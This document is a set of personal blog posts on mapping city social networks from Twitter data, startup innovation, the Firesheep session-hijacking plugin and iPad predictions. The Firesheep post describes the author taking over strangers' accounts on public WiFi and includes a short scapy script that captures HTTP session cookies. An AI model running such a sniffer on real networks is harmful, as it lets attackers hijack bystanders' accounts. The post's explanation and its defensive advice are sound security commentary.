
The Math Behind Peoplemaps

For the last few years I’ve been working on mapping out social relationships in cities with my project peoplemaps.org. I had the chance to speak about this work recently at the TED Global conference, and the talk was featured this week on the ted.com website. This has led to many, many inquiries about the project, how it works, and the limits of its applicability.

So I wanted to take an opportunity to explain in high-level terms how I’m doing this work, what it tells us, and what it does not. I’ll attempt here to cover the approach in enough detail so others can reproduce it, without going into deep implementation details which are frankly not important to understanding the concepts. However, I’m happy to collaborate with anyone who would like to discuss implementations.

Theoretical Foundation

In the real world, each of us has personal relationships: our family, friends, co-workers, people we interact with in social settings, children and their parents and friends, and the like. The conventional wisdom is that we can maintain roughly 150 real-world relationships — this is called the “Dunbar Number,” named after Robin Dunbar, the anthropologist who identified the phenomenon. Some people may have more, some people less, but 150 is probably average.

In an online setting, people may have many more relationships — perhaps a few thousand that they interact with in some meaningful way. However, the offline, real-world relationships that people have will likely be an overlapping subset of the relationships they have in an online setting. Online relationships are often more flexible (they can be global and operate at all times of day), though not always as meaningful. Still, if you are able to look at people’s online relationships in a specific geography, you have at least a proxy for understanding their offline, real-world relationships as well.

The ability to infer things about both offline and online interactions is derived from the principle of homophily, which sociologists identified as the powerful tendency for people to cluster into groups of people who are similar to themselves. Colloquially we know this through the saying, “birds of a feather flock together,” and it is powerfully demonstrated in network data.

So if we accept the notion that people do, in fact, have relationships that both shape and are shaped by their interactions, then it follows that there may be some ways to measure these relationships with at least some level of fidelity. Social network data appears to offer at least a window into these real-world relationships, though each dataset has biases which are not yet well understood. However, by comparing results from different networks, we can start to get a sense for what those biases might be.

This is where the state of the art for this research is right now: trying to understand how these different data sets are biased, the nature of those biases, and whether the biases are material in terms of distorting the “real world” network we are trying to understand. However, this lack of perfect understanding isn’t preventing people from using this data to do all kinds of things: from recommending movies to helping you find “people you may know” to identifying terror cells using cell-phone “metadata.” All of these activities use essentially the same approach.

These Maps Are NOT Geographic

A quick caveat: while we typically think of city maps as geographic, these maps are explicitly NOT geographic in nature. Rather, they show communities and their relationships to each other. The position of communities relative to the page is always arbitrary; their position relative to each other is determined by the presence or absence of relationships between them. I bring this up now to dispel any notion that these maps are geographic, despite whatever resemblance (real or imagined) they might have to geography. That said, there are ways to tie these maps back to geography and use it as an additional investigative tool, but you should assume that all discussion of maps here is non-geographic unless otherwise noted.

Gathering the Data — and Avoiding Bieber Holes

Depending on the dataset you are looking to explore, the exact details of how you gather data will vary somewhat; I have used data from Twitter, Facebook, LinkedIn, AngelList, email, and other sources. In all cases, you will want to gather a set of “nodes” (people, users, or companies, depending on the data source) and “edges” (relationships between them — typically “friend” or “follow” relationships.)

For the case of the city network maps, this is the approach I have used with Twitter data (a code sketch follows the list):

  1. Define a target geography using a geographic bounding box.
  2. Determine a set of keywords and location names that users inside the target geography may use to identify their location/geography.
  3. Identify a set of “seed” users within the bounding box, or who otherwise verifiably appear to be within the target geography.
  4. Determine which user identifiers are followed by a given user, and record that in a list that maintains the number of followers for a given user identifier.
  5. When a given user identifier is followed by a number of people exceeding a threshold, request the full user information for that user to see if it appears to be within the target geography.
  6. If that user is within the target geography, then feed it into step 4, requesting the user identifiers followed by that user.
  7. Repeat steps 4-6 until there are few new additions to the dataset.
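Here is a minimal sketch of that crawl loop in Python. The helpers fetch_following, fetch_profile, and in_target_geo are hypothetical stand-ins for your API client and location heuristics; the structure of the snowball sampling is what matters.

```python
from collections import Counter, deque

def crawl(seed_ids, fetch_following, fetch_profile, in_target_geo,
          threshold=3):
    """Snowball-sample a follow graph outward from in-geography seeds."""
    follow_counts = Counter()    # how many accepted users follow each id
    accepted = set(seed_ids)     # users confirmed inside the target geography
    edges = []                   # (follower, followed) pairs for layout later
    frontier = deque(seed_ids)

    while frontier:              # step 7: stop when nothing new turns up
        user = frontier.popleft()
        for followed in fetch_following(user):          # step 4
            edges.append((user, followed))
            follow_counts[followed] += 1
            # Step 5: only pay for a full profile lookup once a candidate
            # is followed by enough confirmed users.
            if followed not in accepted and follow_counts[followed] == threshold:
                if in_target_geo(fetch_profile(followed)):
                    accepted.add(followed)
                    frontier.append(followed)           # step 6
    return accepted, edges
```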

Doing this process once produces a “first draft” data set, which can then be visualized for inspection — to look for improper inclusions, obvious exclusions, and any particular data artifacts or pathologies.

At this stage, various problems may appear. For example, if you are trying to visualize Birmingham, UK, you will likely end up with some data for Birmingham, Alabama, owing to the genuine ambiguity between the two communities’ names. At this point, you can modify the test used to determine whether something is inside the target, regenerate the dataset, and perform additional data-gathering iterations to capture more of the “right” data. This process typically takes a few iterations to really drill down into the data you’re looking for.

One persistent problem I’ve come across is a phenomenon called Bieber Holes, which are essentially regions of the network occupied by Justin Bieber fans. They are so virulent, and their networks so dense, that only aggressive exclusion filters can prevent the algorithm from diving down into these holes and unearthing millions of Beliebers, only a fraction of whom may pass location tests. Anyway, I’ve developed good techniques to avoid Bieber holes (and similar phenomena), but it’s a reminder that when applying algorithmic approaches to data from the public, editorial discretion is required.

Laying out the Network Graph

There are dozens of algorithms for laying out network graph data, each optimized to illustrate different properties of the graph. Since I’m primarily interested in homophily and clustering, I’m looking for layouts that express communities of relationships. A good way to do that is to use a force-directed graph layout algorithm: with this approach, relationships act like springs (expressing Hooke’s law), and each node repels nearby nodes (expressing Coulomb’s law). By iteratively redrawing the graph under these forces, it eventually reaches a steady state which exhibits the following properties (a toy implementation follows the list):

  1. People with many relationships between them will be arranged into tight clusters.
  2. People with the fewest relationships between them will appear at opposite edges of the graph.
  3. People who have many relationships at both ends of the graph will appear in the middle.
  4. Clusters with few or no relationships between them will appear very far apart on the graph.
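To make the mechanics concrete, here is a toy force-directed layout in Python with numpy. It is a sketch only; real work uses mature implementations (Gephi’s layouts, for instance), and the force constants here are arbitrary.

```python
import numpy as np

def force_layout(n, edges, iters=500, k_spring=0.01, k_repel=0.1, dt=0.05):
    """Toy force-directed layout: springs on edges, pairwise repulsion."""
    pos = np.random.rand(n, 2)                     # random starting positions
    for _ in range(iters):
        force = np.zeros((n, 2))
        # Repulsion between every pair of nodes (a simplified Coulomb term).
        delta = pos[:, None, :] - pos[None, :, :]  # (n, n, 2) displacements
        dist2 = (delta ** 2).sum(-1) + 1e-9        # avoid division by zero
        force += (k_repel * delta / dist2[..., None]).sum(axis=1)
        # Springs pull connected nodes together (the Hooke term).
        for i, j in edges:
            d = pos[j] - pos[i]
            force[i] += k_spring * d
            force[j] -= k_spring * d
        pos += dt * force                          # one relaxation step
    return pos
```

Run it on two fully meshed cliques of five with no cross-links and it settles into exactly the two separated “balls” described below.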

You can think of this in very simple terms. If you have a room full of 10 people, there can be a total of 45 relationships between them (n * (n-1)/2, since no one is friends with themselves). If every person is friends with every other person, this network will appear as a perfect, symmetric “ball” under the rules of a force-directed graph layout.

Likewise, let’s suppose that same room of 10 people was grouped into two groups of 5 people, and that those two groups hated each other and refused to speak, but each member of each group knows every other member of their own group. You would see two perfect “ball” layouts (each with 10 relationships expressed), but with no connection between them.

When we visualize data from a city in this way, we are essentially measuring the separateness of communities — whether we see several of these separate groups or whether we see one unified community.

Note that in the example with 10 people in one group, we have a total of 45 relationships, while in the example with two groups of 5, there are only 20 (2 x 10). Scaling that up to a city of 500,000 people, if the city was fully meshed, there would be 124,999,750,000 total relationships, while if that city is segregated into two groups of 250,000, there can only be 31,249,875,000 relationships in each group, or 62,499,750,000 total relationships across both groups, which is a little less than half of the number of relationships possible if the two groups merged.
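All of these counts come from the same handshake formula, which is easy to sanity-check:

```python
# Possible relationships among n people: n * (n - 1) / 2.
def pairs(n):
    return n * (n - 1) // 2

assert pairs(10) == 45                        # one room of 10
assert 2 * pairs(5) == 20                     # two cliques of 5
assert pairs(500_000) == 124_999_750_000      # a fully meshed city
assert 2 * pairs(250_000) == 62_499_750_000   # the same city, split in two
```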

Detecting Communities and Adding Color

Within the network, we can use algorithms to detect distinct communities. Communities are defined by the number of shared relationships within a given subgroup. We use an algorithm called the Louvain community detection algorithm, which iteratively determines communities of interest within the larger network, and assigns a community membership to each user accordingly.
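As a sketch, recent versions of networkx ship a Louvain implementation (the standalone python-louvain package is a common alternative):

```python
import networkx as nx
from networkx.algorithms.community import louvain_communities

G = nx.Graph()
G.add_edges_from(edges)   # the follow edges gathered during the crawl

# Partition the graph by modularity optimization; each set is a community.
communities = louvain_communities(G, seed=42)
membership = {node: i for i, com in enumerate(communities) for node in com}
```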

We can then assign each of these communities a color. For my work so far, I have assigned these colors arbitrarily, with the only goal of visually differentiating one community from another. This helps to generate an aesthetically pleasing visual representation.

While communities often correlate with the clustering exhibited by the layout algorithm, for nodes that are not clearly members of only one cluster, color can be used to indicate their primary community affiliation. This is helpful in the visualization because it generates blended color fields that can give a sense of the boundary between two communities.

For example, a group primarily concerned with politics (blue) and a group primarily concerned with music (yellow) may have a mix of both blue and yellow nodes in the space between those distinct communities, and you can get a sense that those people are interested in both communities, and what their primary affiliation might be.

Assigning Node Size with In-Degree

In a graph of Twitter users, it can be helpful to indicate how many people are following a given user within our specific graph (note that this is calculated for our subgraph, not taken from a user’s “global” follower count as displayed by Twitter.)

We can do that by making the “dot” associated with each user bigger or smaller based on the number of followers. This has no real effect on the shape of the network, but it can be helpful in determining what kinds of users are where, and how people have organized themselves into communities of interest.
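Continuing the networkx sketch above, in-degree within the subgraph is cheap to compute (the scaling constants here are arbitrary):

```python
D = nx.DiGraph(edges)   # directed follow edges: (follower, followed)

# Size each node by its in-degree within our subgraph, not by the
# "global" follower count Twitter displays.
sizes = {u: 10 + 2 * D.in_degree(u) for u in D.nodes}
```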

Determining Community Interests

After you have a colored graph with communities and clusters, it’s time to figure out what these clusters are organized around. Start by manually inspecting nodes to see who they are, often beginning with the biggest nodes. Typically you’ll find that people organize themselves into groups like these: sports, music, mainstream media, politics, food, technology, arts, books, culture, and the like. These clusterings vary somewhat from city to city, but you’ll see some common patterns between cities.

After communities are detected, we can start to monitor traffic coming out of these communities to look for topics of conversation and other characteristics which may help explain the observed clustering. For instance, we can gather a corpus of Twitter traffic for each community, recording (a tallying sketch follows the list):

  1. hashtags
  2. commonly shared links
  3. languages in use
  4. operating systems in use (desktop vs. mobile, etc.)
  5. client software in use
  6. geographic coordinates (as provided by GPS)
  7. age of user accounts
  8. user mentions

With this kind of data recorded as a histogram for each community, we can start to get a pretty good sense that a given group is mostly concerned with sports, music, politics, and the like. By working with a collaborator who is well-versed with the culture of a given place, we can also get a sense of local subtleties that might not be immediately obvious to an outside observer. These insights can be used to generate legends for a final graph product, and other editorial content.

Investigating Race

Another phenomenon is very apparent in American cities: people separate by race. American cities like Baltimore and St. Louis are polarized into black and white communities, with some people bridging in the middle. These cities present roughly as eccentric polygons, with differences in mesh density at each end of a racially polarized spectrum. Relatively prosperous European cities, like Munich or Barcelona, present more like “balls,” with no clear majority/minority tension displayed. Istanbul, by contrast, shows a strong divide between the rich establishment and a large emergent cohort of frustrated young men.

In many American cities, we do observe strong racial homophily in the data. For example, in the data for a city like Baltimore, people at opposite ends of the spectrum are generally strongly identifiable as “very white” or “very black.” This is a touchy subject, and it’s difficult to discuss without offending people; however, the aim here is to understand what the data is showing us, not to make generalizations about race or prescribe measures based on it.

One way to ground this discussion about race is to look at the profile photos associated with user accounts. We can gather these photos in bulk, and when displaying them together, it quickly becomes clear that people have often organized themselves around skin color. When they have not organized themselves around skin color, they are organized around other cultural signifiers like fashion or style. This can give us a concrete sense that certain communities consist primarily of one race or another. However, this is not to suggest that outliers do not exist, or to make any statement about any given individual, and it certainly does not suggest any relationship between race and the ability or proclivity to participate in any given cluster or clusters.

The Final Product

Once we have refined the data, identified communities, investigated trends and topics within communities, and potentially looked at photos, profiles, and other cultural signifiers, we are in a position to annotate the network map with editorial legends. This is a fundamentally human process. I generally use a tool like Photoshop or Keynote to annotate an image, but this could be done in a number of ways. Once this step is done, a final product can be exported.

This entire process of taking data from one or more biased sources, refining data, and then using a human editor who also has a bias produces a final end product which is comparable to an “op-ed” in a newspaper: it’s an expression of one possible mental model of the world, informed by a combination of facts, errors, and pre-existing opinions. It’s up to the reader to determine its utility, but to the extent it offers a novel view and the reader deems the data and editorial biases acceptable, such renderings can be an informative lens through which to see a city.

A Note About Bias, Inclusions, and Exclusions

A common criticism of large-scale social network analysis is that it is not representative because it is biased in some way. A typical statement is, “I don’t use Twitter, so the results don’t include me, therefore I question the validity of the approach.” Likewise, people may say the same thing about LinkedIn or Facebook, or start into a long explanation of how their online habits are very different from their offline reality. These are important facts to consider, but the question is really whether network analysis is representative enough to start to deliver information that we didn’t have until now.

To answer this, it’s helpful to think about this in terms of recent history. In 2004 or 2007, it probably wasn’t helpful to say anything in particular about data from social networks, because none of them had enough penetration to deliver insights beyond a very biased community of early adopters: whether it was geeks in the case of Twitter, or young music fans in the case of MySpace, or college students in the case of Facebook.

As these networks have continued to evolve, however, their penetration is increasing rapidly. They are also accreting a great deal of historical data about people and their positions in social networks, which gives us clues as to their offline interactions. This accretion of data will only continue and begin to paint a more complete and multi-dimensional picture of our culture — especially if you correlate the data from multiple social networks.

I believe we are now at a point where these data sets are large and detailed enough to offer important insights about our “real world” culture. This belief rests on a few observations. First, it’s possible to get a good working image of a community by gathering data over just a few hours. While we make every effort to gather as much data as is realistically possible before making statements about a community, the effect of adding more data is additive: we add members to the community, but we do not fundamentally alter its shape.

To understand this effect, it is helpful to consider an analogy from astronomy. A more powerful telescope can yield a better, sharper image of a star formation, but it changes neither the shape of the star formation nor our basic understanding of its structure. Better tools simply yield more detailed data. I believe we are at a point where we have enough data to begin to understand structures, and that more data will yield more detailed understanding — but not alter the fundamental shapes we are beginning to uncover. This line of thinking is helpful in comprehending “exclusions.”

On the subject of “false inclusions,” these are generally sussed out in the layout and review process, but all of the graphs I have produced have included a limited number of false inclusions as a practically inevitable artifact of the process. As a result, any statements one may make about a specific individual based on this kind of analysis may or may not be valid: they should be viewed through the lens of the biases disclosed alongside the visualization. However, repeated experience has shown that removing the small number of false inclusions does not have a material effect on the community structure.

On the subject of “network bias” (i.e., “I don’t use x, therefore conclusions are not valid”), when comparing data from Facebook, Twitter, LinkedIn, AngelList, and other sources, the same patterns of homophily are exhibited. While each network has its own bias (LinkedIn towards professionals, Twitter towards both youths and professionals, Facebook towards grandparents), if we limit analysis to a given geography, we will inevitably see homophilic tendencies which are correlated in each network.

While it’s difficult to speak about this in detail yet, as obtaining fully comparable data sets from each source is currently quite challenging, early investigations indicate that the same patterns are exhibited across all networks. This squares with the notion that examining these networks is but a proxy for examining real-world relationships. Ultimately, these networks must converge into something that approximates this abstract, Euclidean reality, and as we get more data and correlate it, it’s likely that a unified data set will closely reflect the actual geometry of our communities.

Future Research Directions

This kind of analysis is forming the basis for the emergent field of “computational sociology,” which is currently being explored by a variety of researchers around the world. This work has a number of important implications, and poses questions like:

  • What do we mean by diversity? If we should be looking to bridge networks, is race a helpful proxy for that function? Or should we be looking to develop new, better measures of diversity?
  • What is the nature of segregation? Is physical segregation a product of our social networks? Or is it a manifestation of them?
  • What is the role of urban planning? Is our social fabric something that’s shaped by urban planning, or are our cities simply a manifestation of our social fabric?
  • What kind of interventions might we undertake to improve a city’s health? Should they be based first on creating and improving relationships?
  • What is creative capital and how can we maximize it? If creative capital is a byproduct of relationships between people with diverse backgrounds, then we should be able to increase creative capital by orders of magnitude by bridging networks together and increasing the number of relationships overall.

The level of detail we can extract from network data in cities exceeds that of any data source we have ever had, and it can supplement many other indicators currently used to measure community health and make decisions about resource allocation. For example, the census may tell us someone’s race, family name, and physical address, but it tells us very little about their participation in the social fabric. And if we believe that the city is primarily manifested as the sum total of social relationships, then data about social interactions is clearly more useful than the other attributes we may harvest.

Discerning Stable Structures vs. Topical Discussions

Many researchers have been using social network data like Tweets to characterize conversations around a topic; and it is true that by harvesting massive quantities of Tweets, one can discern trends, conversation leaders, and other insights. However, this type of analysis tends to be topical, shifts a great deal depending on whether people are active online, and carries biases about why they might be active online. Regardless, this kind of research is well worth understanding, and may ultimately lead to a better understanding of network structure formation. However, I want to differentiate it from the kind of inquiry I am pursuing.

So, rather than “you are what you tweet,” I believe the truth is something more like “you tweet what you are.” Network follow structures tend to be very stable; while they do change and evolve over time, one interesting feature of the process I am using is that its results are repeatable. That is to say, if I analyze Baltimore one day and repeat the analysis a month later, I will obtain a comparable result. This is not likely to be the case with semantic analysis, as topics and chatter may change over the course of a few weeks.

Tracking (and Animating) Changes Over Time

Because network structure analysis is fundamentally labor-intensive and somewhat expensive to compute, it’s difficult to automate and to perform on an ongoing basis. For example, it would be nice to know whether things in Baltimore are getting “better” or “worse.” Right now, only by taking periodic snapshots and comparing them can we get a sense of this. It would be helpful to be able to animate changes over time; while this is theoretically possible, the tools to do it currently have to be built by hand. My hope is to apply such tools to the process and dramatically increase our ability to monitor network structure in real time and spot trends.

Ultimately, this will give us some ability to see our social structure change in near real-time, developing a sense as to whether interventions are having a positive effect, or any effect at all.

Healthy vs. Unhealthy Network Patterns – and Brain Development

Dr. Sandy Pentland, an MIT researcher who is perhaps the leading figure in the field of computational sociology, has suggested that there are certain patterns that characterize “healthy” networks, as well as patterns that characterize “unhealthy” networks.

Healthy networks are characterized by:

  • Frequent, short interactions
  • Broad participation by all nodes and meshing
  • Acknowledgement of contributions
  • A tendency to explore other parts of the network

By contrast, unhealthy networks exhibit the opposite patterns: broadcast vs. peer-to-peer interactions; fewer network connections; isolated subnetworks; a lack of exploration of other parts of the network.

Perhaps the most telling finding is that these patterns are not limited to just human networks, but also appear in other colony-based organisms, like bees. It appears that there are universal patterns of network health that apply to life in general.

The other important finding is that lack of network exploration affects brain development in young people. Specifically, young people who grow up in an environment where network exploration is not valued tend to exhibit structural changes in the brain which appear to dampen their desire to explore networks as adults. This produces a multi-generational effect, where children who grow up in isolated networks tend to persist in isolated networks, and to pass that on to their children.

This suggests that one possible intervention is to promote network exploration at an early age across the entire population. How we might do this is certainly open to discussion, but it seems to be a very powerful tool in breaking down divisions in our social networks.

What’s next?

As this project advances, we are gathering ever-larger datasets. This requires more and more computational power and distributed algorithms for visualization. If this is something you’re also working on, I would like to talk to you — please contact me. There are real challenges in scaling this up, but there are also interesting opportunities emerging to apply these approaches!

Mapping Your City

We have a long list of places that we’re looking at mapping, and we are trying to prioritize opportunities. If you have a mapping project you would like us to consider, please contact us. We will try to get back to you as quickly as possible, but in general we’re looking for projects that can make a serious social impact. It takes real effort to generate these maps, so think about possible partners who could fund this work and help advance this science.

Real Innovation Takes Time

Combinatorial Innovation

There are so many new technologies today: tablets, geolocation, video chat, great app frameworks. It is easy to cherry-pick “combinatorial” innovations that seem compelling and can maybe even be monetized readily.

But all those innovations are inevitable. If our technologies afford a certain possibility, it will be realized. “That’s not a company, that’s a feature,” is one criticism I’ve heard of many “startups.”

These combinatorial, feature-oriented “X for Y” endeavors are attractive because they can often be built quickly.

Startup Weekend events send an implicit message that a meaningful business can be fleshed out in just a couple of days. And I argue that is not true. That might be a good forum to get practice with building a quick combinatorial technology and working with others, but a real innovation, much less a meaningful business, takes real time.

I think people are often looking in the wrong places for innovation, often because they don’t really take the time to do the homework, observation, and deep reflection necessary to arrive at a true insight. We want things to be quick and easy.

Changing Minds, and Behaviors

The biggest innovations require asking people to change their beliefs, habits, and behaviors.

iPhone: “why would I want a smartphone without a physical keyboard? It’s too expensive. I can’t install apps.”

Twitter: “what is this for? Why would anyone do this? Who cares what I had for breakfast?”

iPad: “an expensive toy. Could never replace a real laptop. Can’t run real office applications. The enterprise will never adopt it.”

Foursquare: “only hipsters and bar hoppers would ever do this. They are letting people know when to rob them. I don’t want people to know where I am.”

And these innovations have taken years of constant attention to bring to their current state. And they are not done.

One Innovator’s Story

Dennis Crowley, founder of Foursquare, was in the room at Wherecamp in 2007 where I was giving a talk about location check-in habits via Twitter (a subject I knew well because of my Twittervision service, which allowed this.)

Dennis, of course, also founded the precursor to Foursquare, Dodgeball, which he sold to Google in 2005 (they promptly killed it.)

But Dennis wanted to see his vision come to pass, and he knew it would someday be possible — though at that point the iPhone had not been released and it would be nearly two years before it supported GPS location technology.

But there Dennis was, doing his homework in 2007, studying user behavior to figure out exactly what behaviors he would have to encourage to make Foursquare work.

He asked me, “so, people are really putting their home and work locations formatted inside tweets in order to update their location?”

“Yep, a few thousand times a day,” I replied.

“That’s cool. That’s really cool stuff,” he said. And from that, and years of similar evidence-gathering and study, Foursquare would be born.

So, creating Foursquare took about five years. (I could have “stolen” the idea and built Foursquare myself. But I didn’t execute on that; it was his vision to pursue.) Dennis did his homework. He was prepared. And his vision preceded the technology that enabled it.

Why, not How

Real innovation doesn’t come from a weekend. It comes from passion, years of study, understanding deep insights and the “why,” and persistence in seeing something new through to market, along with the marketing and cheerleading that will make it successful.

The iPad owes much to Steve Jobs’ love of calligraphy. He cultivated a sense of aesthetics because of that initial interest. He didn’t set out to “make money” but rather dedicated himself to changing the world for the better using the entirety of his humanity. Time studying art wasn’t “lost,” it was R&D for the Mac, iPhone, and iPad.

Many of today’s entrepreneurs could stand to do less “hustling” and more reading, exploring, reflecting, and gathering input — and when it is time to make stuff, set their sights as high as possible.

There is more to this world than money, and there are countless opportunities to make it a vastly better place. Rather than using our CPU cycles just playing with combinatorial innovations, let’s devote ourselves to making the world as amazing as possible. Try to take time to reflect on how you can make the world better, and not just on what current technology affords.

Drop Everything and Pay Attention to Firesheep Now

Firesheep is a startling plugin that allows anyone to easily impersonate the login credentials of others on dozens of sites. It works on any unencrypted WiFi connection and is stupid-simple to set up. Anyone can do it in a matter of minutes.

Just to illustrate how easy it is to set up: I was on Virgin America flight VX67 from Washington to San Francisco yesterday.

All I had to do to get going with Firesheep was download Firefox (onto my new MacBook Air) using the in-flight WiFi, and then download the Firesheep plugin for Firefox. Just drag the plugin into Firefox and it installs. Reload Firefox and you’re ready to go.

Click “Start Capturing” and you are instantly snooping on every interaction occurring on the WiFi network. In my case yesterday, that meant snooping on everybody who was using the WiFi on my flight.

What’s At Risk?

Within just a couple of minutes, I was able to impersonate 3 people on Facebook (updating their status, exploring friends, doing anything I wanted to – of course I didn’t). Twitter is also at risk. So is Gmail. And so is Amazon.

Access to Amazon is perhaps the most worrying. Once I realized I was inside someone else’s Amazon account, I quickly shut down Firesheep: this is some scary stuff. What if I had changed the shipping address for the account and done a one-click order on a $10,000 watch or a $2,000 plasma TV?

This was all at 37,000 feet in an airplane (and way more entertaining than SkyMall). Like taking candy from a baby.

Even More Shocking…

Later in the afternoon I was at one of the Internet industry’s high-profile events: the Web 2.0 Summit produced by O’Reilly. There on the hotel’s WiFi, which was set up to serve the summit, I ran Firesheep. Within seconds I had compromised about 25 accounts, including the Twitter accounts of O’Reilly Media and TechCrunch writer Alexia Tsotsis. Change passwords, tweet as them, friend and de-friend people? No problem. Here’s what I saw. (Note that my accounts were vulnerable as well.)


How It Works

I have not yet studied this exploit carefully enough to explain it in full detail, but my understanding is that on an open WiFi network, it’s trivial to capture in cleartext all of the web interactions of the users around you on the same IP network. Once you can do that (something Firesheep achieves using the pcap library, capturing port 80), you can sniff for credential information specific to particular websites. Firesheep supports a couple of dozen sites out of the box, including the major social and mail services (Facebook, Twitter, Gmail, Gowalla, Foursquare) as well as some more obscure sites relevant to coders (Github, Pivotal Tracker). Ouch. It even has an “import” function so others can write exploits for sites that Firesheep doesn’t know about yet.
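To make the mechanics concrete, here is a heavily simplified sketch of the passive-capture idea in Python using scapy (my choice for illustration; Firesheep itself is a Firefox extension built on pcap). It watches port 80 and prints any Cookie headers that float past, which is where the session credentials live.

```python
from scapy.all import sniff, Raw

def show_cookies(pkt):
    # HTTP on an open network is cleartext: session cookies ride along
    # in plain view on every request, even after an HTTPS login.
    if pkt.haslayer(Raw):
        payload = pkt[Raw].load.decode("latin-1", errors="replace")
        for line in payload.split("\r\n"):
            if line.lower().startswith("cookie:"):
                print(line)

# Passively capture HTTP traffic on the local network (requires root).
sniff(filter="tcp port 80", prn=show_cookies, store=False)
```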

The bottom line is that these sites all need to enforce the use of HTTPS (secure HTTP) rather than HTTP *before* the login handshake occurs. This will force some emergency changes by many sites over the next few days.

This is not a new exploit – it’s always been possible to do this; Firesheep just makes it stupid easy.

A Note On Passwords vs. Encryption

You’ve encountered WiFi networks that require WEP or WPA encryption passwords. These are out of Firesheep’s reach. However, there are a lot of WiFi networks that require “passwords” (such as those at coffee shops, hotels, etc.) but are in fact open networks. Many don’t even require you to log in before you can exploit them via Firesheep. To put it in perspective, every Starbucks location is vulnerable to attack.

The only for-sure ways to stay safe from Firesheep for now are to 1) use only encrypted WiFi networks (that use WPA or equivalent), or 2) use wired networks that you trust. Any open WiFi network can and will be vulnerable to this attack until vulnerable sites switch to using HTTPS for all authentication. Be very careful out there, folks.


Update: After talking with a few folks and thinking through this exploit a little further, I can offer a somewhat more complete explanation of how it works and why blocking it is so difficult.

The exploit does not capture the *password* itself (which is transmitted using HTTPS), but rather the authentication credentials that are stored (and visible) in the session cookie *after* HTTPS authentication has completed.

So, even a one-time password will not address this. The reason boils down to ads and other insecure content that folks want to serve as part of the site experience. Fixing this problem would require serving ads (and images) via HTTPS, which would require major computing resources and have a major impact on the web.

According to one security researcher I spoke to this evening (who formerly ran Yahoo mail), there’s no obvious way around this other than to allow both HTTP and HTTPS content to be served from the same site during the same session, something which presently triggers an alert to the user (and would have the effect of freaking them out). Such an alert is a good thing; turning it off is not a net gain. It shouldn’t be up to the user to sort out which of the resources a site requests should be secure and which need not be.

So, it’s a real dilemma. No one seems to be sure how to really address it other than to eliminate or curb the use of open networks, which is probably where it’s going to end up. So open WiFi is now basically over. Expect places that had been using it to post publicly available WPA passwords, which solves the problem.

iPad: What Will Happen

I’m enjoying watching folks around the world prognosticate about the iPad, what it is and is not, how it might sell and what it means for computing. Sorry, but I can’t help but weigh in with some predictions.

My son (age 12) and I have a bet at the moment about the outcome of the NCAA basketball tournament, which I know nothing at all about: I wagered that Duke would emerge victorious (I ignored the rest of the bracket). If I am correct, he owes me $487 trillion; otherwise I owe him $12. (Hey, I’m trying to teach him about Popperian philosophy.)

So, it is with the understanding that if I’m right, you, dear reader, will owe me $487 trillion, that I offer this humble marketplace analysis.

  • iPad will be released on Saturday, April 3. That means that a ton of people are going to get to play with it over the Easter weekend. And I’m talking about people’s moms and aunts here. It’s been widely reported that the experience of using the device is quite seductive, and I’ve argued it’s because it activates different parts of the brain. Somewhere around 200,000 units will be sold over this coming weekend, and each one will be shown to an average of 10.6 other people, creating a latent (nagging) demand for another 2.1 million units.
  • A bunch of old-media outlets will rejigger their offerings for the iPad and try to monetize the audience. Many already have. But this is Waterloo. Or Little Big Horn. They will sucker some folks into using the device for the “traditional” content, but sales will be disappointing. Ultimately they are going to have to radically reconsolidate their offerings and innovate in some serious ways. See below re: piracy.
  • The device is going to continue to rip through the population, busting past all sales records for a general computing device. This will have nothing to do with features or even the apps (yet). This will be based on the user experience alone. Everyone who uses the thing comes away sounding like a religious convert. In the same way that the original iPod just “felt right,” Jony Ive has managed to bring meaning to a general purpose computing device like nothing ever before. The central thing Ive has done is to bring the experience of computing directly to the user, with no barriers and no “analog” devices like the mouse. People will have a visceral relationship with these devices.
  • Roughly 20% of the initial batch of Wi-Fi only devices will be “handed down” to a secondary wave of users when the 3G models are introduced a month later. This will amplify the initial sales numbers, as many folks end up buying two units in the first month.
  • PDF-format books and news will become the lingua franca. What happened to music and movies is about to happen to books. A wave of piracy will couple with a race to the bottom in content prices. Some killer app, possibly Kindle for iPad, will capture a big chunk of the market share. It doesn’t much matter how it plays out, but paper books are going to become items of “significance,” the kind of thing hipsters trade, like vinyl records.
  • All desktop software will seem obsolete overnight. The obsessive attention Apple has paid to aesthetics in the built-in reader, calendar, and email apps will set the bar not only for other app developers on the iPad, but also for the iPhone and particularly the desktop. Expect your Mac to feel particularly creaky. And Windows? It’s gonna seem steampunk compared to the twee aesthetics and colors emerging in the iPad design universe.
  • WiFi is going to become even more ubiquitous and free. Businesses are going to trip over themselves to get iPad users into their establishments, as the iPad rides its way to prominence. WiFi-only iPads are going to be somewhat cooler than the 3G versions.
  • Hipsters are gonna start using iPads as cell phones, using Skype and similar apps to bypass carrier relationships altogether. I’d expect the 3G-iPads to be used for voice too, marking the first significant use of the cellular network in a “data-only” mode, which will ultimately lead to the scrapping of the whole “voice/voicemail/minutes” paradigm. The first carrier to do this will have a temporary competitive advantage.
  • A whole new market in mouseless/keyboardless computing will emerge. Yeah, I don’t know what it’s going to look like either. But the raw numbers (100 million by 2015) of the iPad platform will create a new kind of pop/tech culture. Expect a New York Times Sunday magazine piece, potentially in that publication’s last print issue.
  • The next-generation Macintosh, if there is such a thing, will be based on the iPad OS. It’s hard to say what this might mean, but I would not be surprised if Mac OS were phased out over a few years, or possibly converted into a server-only OS for the Mac Pro / Xserve platform.

Remember that demand is not static, waiting to be filled by the possible universe of devices: if that were the case, the iPod and the Mac and the iPhone should never really have gotten any traction. What Apple understands is that good design can change the market, and invent new markets.

And this is what the iPad will do: invent a new market. And the presence of that new market will profoundly change the dynamics of the existing (previous) market. New demand will emerge, and all kinds of new supply will emerge. The great thing about Apple, particularly Jobs and Ive, is that they know how to drive change.

And that, ultimately, is what entrepreneurship and innovation are all about. If it were just about building devices to match the demands of the existing market, the Chinese seem to do a pretty good job of that.

And I will supply my banking information, so you can wire me the money, when this all comes to pass. If I’m wrong, I’ll buy you a beer.